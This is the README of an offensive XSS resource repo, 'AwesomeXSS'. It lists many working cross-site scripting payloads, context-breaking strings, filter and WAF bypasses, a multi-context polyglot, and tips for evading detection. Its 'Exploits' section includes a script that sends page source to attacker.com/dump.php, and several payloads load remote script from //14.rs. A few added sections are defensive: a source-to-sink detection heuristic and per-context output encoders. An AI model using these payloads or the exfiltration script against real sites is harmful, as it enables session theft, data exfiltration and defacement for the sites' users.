# AwesomeXSS
Awesome XSS stuff.
Put this repo on watch. I will be updating it regularly.
### Awesome Challenges
- [Google's XSS Challenge](https://xss-game.appspot.com/)
- [prompt(1) to win](http://prompt.ml/)

### Awesome People
- [Somdev Sangwan](https://twitter.com/s0md3v) because I made this repo :3
### Awesome Reads & Presentations
- [XSS in Sarahah](http://www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html)
- [Bypass Any WAF for XSS](https://teamultimate.in/bypass-waf-xss-easily/)
- [XSS in Facebook via PNG Content Type](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)
- [How I met your girlfriend](https://www.youtube.com/watch?v=fWk_rMQiDGc)
- [How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour](https://www.youtube.com/watch?v=9ADubsByGos)
- [Blind XSS](https://www.youtube.com/watch?v=OT0fJEtz7aE)
- [Copy Pest](https://www.slideshare.net/x00mario/copypest)
### Awesome Tools
- [XSStrike](https://github.com/UltimateHackers/XSStrike)
- [xsshunter.com](https://xsshunter.com)
- [BeEF](https://github.com/beefproject/beef)
- [JShell](https://github.com/UltimateHackers/JShell)
### Awesome XSS Mind Maps
A beautiful XSS mind map by Jack Masa, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/jackmasa-mind-map.png)
### Awesome DOM XSS
- Does your input go into a sink? `Vulnerable`
- It doesn't? `Not vulnerable`

**Source**: An input that could be controlled by an external (untrusted) source.
```
document.URL
document.documentURI
document.URLUnencoded (IE 5.5 or later only)
document.baseURI
location
location.href
location.search
location.hash
location.pathname
document.cookie
document.referrer
window.name
history.pushState()
history.replaceState()
localStorage
sessionStorage
```
**Sink**: A potentially dangerous method that could lead to a vulnerability, in this case a DOM-based XSS.
```
eval
Function
setTimeout
setInterval
setImmediate
execScript
crypto.generateCRMFRequest
ScriptElement.src
ScriptElement.text
ScriptElement.textContent
ScriptElement.innerText
anyTag.onEventName
document.write
document.writeln
anyElement.innerHTML
Range.createContextualFragment
window.location
document.location
```
This comprehensive list of sinks and sources is taken from [domxsswiki](https://github.com/wisec/domxsswiki).
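As an added review aid (not part of this list or of domxsswiki), the following heuristic flags statements in page JavaScript where one of the sources above reaches one of the sinks, directly or through an intermediate variable. `SOURCES`, `SINKS`, `findDomXssFlows` and the sample script are constructed here; it assumes straight-line code with one statement per line and does substring matching only.

```javascript
// Added triage heuristic (not from the AwesomeXSS repo or domxsswiki): flag
// statements where a DOM XSS source reaches a sink, directly or through a
// variable. Substring matching only; a review aid, not a JavaScript parser.
const SOURCES = ['document.URL', 'document.documentURI', 'document.baseURI',
  'location.href', 'location.search', 'location.hash', 'location.pathname',
  'document.cookie', 'document.referrer', 'window.name',
  'localStorage', 'sessionStorage'];
const SINKS = ['eval(', 'Function(', 'setTimeout(', 'setInterval(',
  'document.write(', 'document.writeln(', '.innerHTML', '.src',
  'createContextualFragment(', 'window.location', 'document.location'];

function findDomXssFlows(script) {
  const tainted = new Set(); // variables assigned from a source or a tainted var
  const findings = [];
  script.split('\n').forEach((line, idx) => {
    const stmt = line.trim();
    if (!stmt || stmt.startsWith('//')) return;
    const hasSource = SOURCES.some((s) => stmt.includes(s));
    const hasTainted = [...tainted].some((v) => new RegExp('\\b' + v + '\\b').test(stmt));
    // Propagate taint through plain assignments: var q = location.hash.slice(1);
    const m = stmt.match(/^(?:var|let|const)?\s*([A-Za-z_$][\w$]*)\s*=[^=]/);
    if (m && (hasSource || hasTainted)) tainted.add(m[1]);
    const sink = SINKS.find((s) => stmt.includes(s));
    if (sink && (hasSource || hasTainted)) {
      findings.push({ line: idx + 1, sink, text: stmt });
    }
  });
  return findings;
}

// Constructed sample page script: one vulnerable flow (location.hash -> innerHTML),
// one safe rendering of the same value (textContent), and one direct eval of a source.
const SAMPLE_SCRIPT = [
  "var q = location.hash.slice(1);",
  "var out = document.getElementById('out');",
  "out.innerHTML = 'You searched for ' + decodeURIComponent(q);",
  "var safe = document.getElementById('safe');",
  "safe.textContent = decodeURIComponent(q);",
  "eval(document.cookie);",
].join('\n');

console.log(findDomXssFlows(SAMPLE_SCRIPT)); // lines 3 and 6 are reported
```

The textContent line is not reported even though it carries tainted data, which is the distinction the source/sink model above makes: the value only becomes a vulnerability when it reaches a sink.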
### Awesome Payloads
```
<d3"<"/onclick="1>[confirm``]"<">z
<d3/onmouseenter=[2].find(confirm)>z
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javas&#99;ript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1))"">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>
```
### Awesome Polyglots
Here's an XSS polyglot that I made which can break out of 20+ contexts:
```
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
```
Explanation of how it works, [here](https://github.com/s0md3v/AwesomeXSS/blob/master/Database/polyglot.png)
### Awesome Tags & Event Handlers
- [105 Event Handlers with description](https://github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)
- [200 Event Handlers without description](http://pastebin.com/raw/WwcBmz5J)

Some HTML tags that you will be using
```
img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video
```
### Awesome Context Breaking
#### HTML Context
Case: `<tag>You searched for $input.</tag>`
```
<svg onload=alert()>
</tag><svg onload=alert()>
```
#### Attribute Context
Case: `<tag attribute="$input">`
```
"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
" onmouseover=alert()//
"autofocus/onfocus="alert()
```
#### JavaScript Context
Case: `<script> var something = '$input'; </script>`
```
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>
```
### Awesome Confirm Variants
Yep, confirm because alert is too mainstream.
```
confirm()
confirm``
(((confirm)))``
co\u006efirm()
new class extends confirm`` {}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)
```
### Awesome Exploits
##### Replace all links
```javascript
Array.from(document.getElementsByTagName("a")).forEach(function (i) {
  i.href = "https://attacker.com";
});
```
##### Source Code Stealer
```javascript
var request = new XMLHttpRequest();
request.open("GET", url, true);
request.send();
request.onreadystatechange = function () {
  if (request.readyState == 4)
    response = request.responseText;
  var dump = new XMLHttpRequest();
  dump.open("POST", "attacker.com/dump.php", true);
  dump.send(response);
}
```
A good compilation of advanced XSS exploits can be found [here](http://www.xss-payloads.com/payloads-list.html?a#category=all)
### Awesome Probing
If none of this works, take a look at the **Awesome Bypassing** section.

First of all, enter a non-malicious string like **d3v** and look at the source code to get an idea about the number and contexts of reflections.

Now for attribute context, check if double quotes (") are being filtered by entering `x"d3v`. If it gets altered to `x&quot;d3v`, chances are that the output is getting properly escaped. If this happens, try doing the same for single quotes (') by entering `x'd3v`; if it gets altered to `x&apos;`, you are doomed. The only thing you can try is encoding.

If the quotes are not being filtered, you can simply try payloads from the **Awesome Context Breaking** section.

For JavaScript context, check which quotes are being used, for example whether they are doing
```
variable = 'value' or variable = "value"
```
Now let's say single quotes (') are in use; in that case enter `x'd3v`. If it gets altered to `x\'d3v`, try escaping the backslash (\) by adding a backslash to your probe, i.e. `x\'d3v`. If it works, use the following payload:
```
\'-alert()//
```
But if it gets altered to `x\\'d3v`, the only thing you can try is closing the script tag itself by using
```
</script><svg onload=alert()>
```
For simple HTML context, the probe is `x<d3v`. If it gets altered to `x>d3v`, proper sanitization is in place. If it gets reflected as it is, you can enter a dummy tag to check for potential filters. The dummy tag I like to use is `x<xxx>`. If it gets stripped or altered in any way, it means the filter is looking for a pair of `<` and `>`. It can simply be bypassed using
```
<svg onload=alert()//
```
or this (it will not work in all cases)
```
<svg onload=alert()
```
If your dummy tag lands in the source code as it is, go for any of these payloads
```
<svg onload=alert()>
<embed src=//14.rs>
<details open ontoggle=alert()>
```
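The defensive counterpart to the Awesome Context Breaking payloads and to the alterations the probing above looks for (`x&quot;d3v`, a backslash escaped before the quote) is output encoding chosen per context. The following is an added example, not code from this repo; `encodeForHtml`, `attributeValue`, `encodeForJsString` and the `renderSearchPage` template are constructed here.

```javascript
// Added example (not from the AwesomeXSS repo): encode untrusted input for the
// exact context it lands in. Matching the context is the whole point; the HTML
// encoder inside a <script> string, or vice versa, leaves the breakout open.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;',
  "'": '&#39;', // HTML5 also defines &apos;, the form the probing text observes
  '/': '&#47;',
};

// HTML body context, and the value half of a quoted attribute.
function encodeForHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Attribute context: always emit the quotes yourself, so "autofocus/onfocus=
// cannot end the value early, and encode what goes between them.
function attributeValue(untrusted) {
  return '"' + encodeForHtml(untrusted) + '"';
}

// Single-quoted JS string literal inside <script>. \uXXXX-escape the quotes,
// the backslash (so x\'d3v cannot re-arm the quote), both line terminators
// (the %0A trick) and < > / so </script> cannot close the block.
function encodeForJsString(untrusted) {
  return String(untrusted).replace(/[\\'"<>\/\n\r\u2028\u2029]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// The three cases from the Context Breaking section, each rendered with the
// encoder for its own context (constructed template).
function renderSearchPage(input) {
  return [
    `<tag>You searched for ${encodeForHtml(input)}.</tag>`,
    `<tag attribute=${attributeValue(input)}>`,
    `<script>var something = '${encodeForJsString(input)}';</script>`,
  ].join('\n');
}
```

Feeding the probes from this section through `renderSearchPage` reproduces the "doomed" outcomes described above: the quote becomes an entity in the attribute, and in the script string both the quote and any backslash in front of it are escaped.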
### Awesome Bypassing
**Note:** None of these payloads use single (') or double quotes (").
- Without event handlers
```
<object data=javascript:confirm()>
<a href=javascript:confirm()>click here
<script src=//14.rs></script>
<script>confirm()</script>
```
- Without space
```
<svg/onload=confirm()>
<iframe/src=javascript:alert(1)>
```
- Without slash (/)
```
<svg onload=confirm()>
<img src=x onerror=confirm()>
```
- Without equal sign (=)
```
<script>confirm()</script>
```
- Without closing angular bracket (>)
```
<svg onload=confirm()//
```
- Without alert, confirm, prompt
```
<script src=//14.rs></script>
<svg onload=co\u006efirm()>
<svg onload=z=co\u006efir\u006d,z()>
```
- Without a valid HTML tag
```
<x onclick=confirm()>click here
<x ondrag=confirm()>drag it
```
- Bypass tag blacklisting
```
</ScRipT>
</script
</script/>
</script x>
```
**Filter bypass procedure by [Rodolfo Assis](https://twitter.com/rodoassis)**
```
<x onxxx=1
%3Cx onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1
<X onxxx=1
<x ONxxx=1
<x OnXxx=1
<X OnXxx=1
<x onxxx=1 onxxx=1
<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
<x 1='1'onxxx=1
<x 1="1"onxxx=1
<x </onxxx=1
<x 1=">" onxxx=1
<http://onxxx%3D1/
<x%2F1=">%22OnXxx%3D1
```
### Awesome Encoding
| HTML | Char | Numeric | Description | Hex | CSS (ISO) | JS (Octal) |
|------|------|---------|-------------|-----|-----------|------------|
| `&quot;` | " | `&#34;` | quotation mark | u+0022 | \0022 | \42 |
| `&num;` | # | `&#35;` | number sign | u+0023 | \0023 | \43 |
| `&dollar;` | $ | `&#36;` | dollar sign | u+0024 | \0024 | \44 |
| `&percnt;` | % | `&#37;` | percent sign | u+0025 | \0025 | \45 |
| `&amp;` | & | `&#38;` | ampersand | u+0026 | \0026 | \46 |
| `&apos;` | ' | `&#39;` | apostrophe | u+0027 | \0027 | \47 |
| `&lpar;` | ( | `&#40;` | left parenthesis | u+0028 | \0028 | \50 |
| `&rpar;` | ) | `&#41;` | right parenthesis | u+0029 | \0029 | \51 |
| `&ast;` | * | `&#42;` | asterisk | u+002A | \002a | \52 |
| `&plus;` | + | `&#43;` | plus sign | u+002B | \002b | \53 |
| `&comma;` | , | `&#44;` | comma | u+002C | \002c | \54 |
| `&minus;` | - | `&#45;` | hyphen-minus | u+002D | \002d | \55 |
| `&period;` | . | `&#46;` | full stop; period | u+002E | \002e | \56 |
| `&sol;` | / | `&#47;` | solidus; slash | u+002F | \002f | \57 |
| `&colon;` | : | `&#58;` | colon | u+003A | \003a | \72 |
| `&semi;` | ; | `&#59;` | semicolon | u+003B | \003b | \73 |
| `&lt;` | < | `&#60;` | less-than | u+003C | \003c | \74 |
| `&equals;` | = | `&#61;` | equals | u+003D | \003d | \75 |
| `&gt;` | > | `&#62;` | greater-than sign | u+003E | \003e | \76 |
| `&quest;` | ? | `&#63;` | question mark | u+003F | \003f | \77 |
| `&commat;` | @ | `&#64;` | at sign; commercial at | u+0040 | \0040 | \100 |
| `&lsqb;` | [ | `&#91;` | left square bracket | u+005B | \005b | \133 |
| `&bsol;` | \ | `&#92;` | backslash | u+005C | \005c | \134 |
| `&rsqb;` | ] | `&#93;` | right square bracket | u+005D | \005d | \135 |
| `&Hat;` | ^ | `&#94;` | circumflex accent | u+005E | \005e | \136 |
| `&lowbar;` | _ | `&#95;` | low line | u+005F | \005f | \137 |
| `&grave;` | \` | `&#96;` | grave accent | u+0060 | \0060 | \u0060 |
| `&lcub;` | { | `&#123;` | left curly bracket | u+007b | \007b | \173 |
| `&verbar;` | \| | `&#124;` | vertical bar | u+007c | \007c | \174 |
| `&rcub;` | } | `&#125;` | right curly bracket | u+007d | \007d | \175 |
### Awesome Tips & Tricks
- `http(s)://` can be shortened to `//` or `/\\` or `\\`.
- `document.cookie` can be shortened to `cookie`. It applies to other DOM objects as well.
- alert and other pop-up functions don't need a value, so stop doing `alert('XSS')` and start doing `alert()`.
- You can use `//` to close a tag instead of `>`.
- I have found that `confirm` is the least detected pop-up function, so stop using `alert`.
- Quotes around an attribute value aren't necessary as long as it doesn't contain spaces. You can use `<script src=//14.rs>` instead of `<script src="//14.rs">`.
- The shortest HTML context XSS payload is `<script src=//14.rs>` (19 chars).
### Awesome Credits
All the payloads are crafted by me unless specified.